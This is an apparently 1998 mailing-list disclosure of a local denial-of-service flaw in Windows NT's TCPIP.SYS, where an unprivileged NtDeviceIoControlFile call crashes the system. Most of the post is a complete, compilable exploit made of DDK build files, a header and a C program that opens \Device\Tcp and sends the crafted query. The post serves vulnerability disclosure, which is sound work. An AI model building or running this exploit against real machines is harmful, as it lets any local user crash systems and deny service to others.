nt-tcpip-dos.txt

`Date: Fri, 25 Sep 1998 18:19:50 +0200  
From: Gigi Mori <[email protected]>  
Subject: Crashing NT with Native Calls  
  
Hi,  
Playing with TCPIP.SYS I've noticed that any user could crash the local system with a IRQL_NOT_LESS_OR_EQUAL exception just calling the undocumented function NtDeviceIoControlFile with an handle to TCPIP and the "right" parameters.  
NtDeviceIoControlFile is the native correspondent of DeviceIoControl and is called by InetMib1.dll and WINSOCK Helper Dlls to retrieve TCPIP statistics thus no special rights are needed to run the exploit.  
The bug resides in TCPIP.SYS InternalIoControl dispatch routine where lacks a check on current IRQ level before processing the query information request.  
  
This is the exploit (you should compile it with DDK):  
  
--------------- begin SOURCES ---------------------------  
  
TARGETNAME= tcpinfo  
TARGETPATH= .  
TARGETTYPE= PROGRAM  
  
INCLUDES= .; ..\; \DDK\inc;\DDK\src\network\inc  
  
SOURCES= tcpinfo.c  
  
UMTYPE= console  
UMBASE= 0x400000  
UMLIBS= \DDK\lib\i386\checked\ntdll.lib  
--------------- end SOURCES -----------------------------  
--------------- begin makefile --------------------------  
#  
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source  
# file to this component. This file merely indirects to the real make file  
# that is shared by all the driver components of the Windows NT DDK  
#  
  
!INCLUDE $(NTMAKEENV)\makefile.def  
--------------- end makefile ----------------------------  
--------------- begin native.h --------------------------  
#ifndef gigi_native_h  
#define gigi_native_h  
  
typedef struct {  
unsigned int bo;  
unsigned int result;  
HANDLE hevent;  
} nt_overlapped;  
  
#define IOCTL_TCP_QUERY_INFORMATION 0x120003  
#endif /* gigi_native_h */  
-------------- end native.h ----------------------------  
-------------- begin tcpexploit.c ------------------------  
#include <ntddk.h>  
#include <stdio.h>  
#include <tdiinfo.h>  
#include "native.h"  
  
#define MAX_NAME_LEN 256  
  
struct {  
HANDLE h_tcp;  
char buff[0x400];  
} g;  
  
  
unsigned int  
open_tcp()  
{  
OBJECT_ATTRIBUTES object_attrs;  
UNICODE_STRING device_tcp;  
WCHAR device_tcp_buff[MAX_NAME_LEN];  
IO_STATUS_BLOCK io_status_block;  
NTSTATUS status;  
  
device_tcp.Buffer = &device_tcp_buff;  
RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");  
  
InitializeObjectAttributes(&object_attrs, &device_tcp,  
OBJ_CASE_INSENSITIVE, NULL, NULL);  
  
status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,  
&io_status_block, 0,  
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,  
FILE_OPEN_IF,  
0, NULL, 0);  
if(status != STATUS_SUCCESS) {  
printf("ZwCreateFile error %#x %#x\n", status, io_status_block);  
  
return 0;  
}  
  
return 1;  
}  
  
void  
close_tcp()  
{  
ZwClose(g.h_tcp);  
}  
  
unsigned int  
tcp_query_information(void *in_buff, unsigned int in_buff_len,  
  
void *out_buff, unsigned int out_buff_len)  
{  
NTSTATUS status;  
nt_overlapped prova;  
unsigned int i, *p;  
  
status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);  
if(status != STATUS_SUCCESS) {  
printf("NtCreateEvent error 0x#x\n", status);  
  
return 0;  
}  
  
status = NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,  
  
&prova,  
IOCTL_TCP_QUERY_INFORMA  
TION,  
  
in_buff,  
in_buff_len,  
  
out_buff,  
out_buff_len);  
  
ZwClose(prova.hevent);  
  
printf("%#X\n", status);  
  
return 1;  
}  
  
void __cdecl  
main()  
{  
struct tcp_request_query_information_ex in_buff;  
  
if(!open_tcp()) {  
return;  
}  
  
in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;  
in_buff.ID.toi_entity.tei_instance = 0;  
in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;  
in_buff.ID.toi_type = INFO_TYPE_CONNECTION;  
in_buff.ID.toi_id = 0x5;  
  
if(!tcp_query_information(&in_buff, 0x24, g.buff, sizeof(g.buff))) {  
return;  
}  
  
close_tcp();  
}  
----------------- end tcpexploit.c ---------------------------------  
  
Luigi Mori --  
Symbolic (http://www.symbolic.it)  
`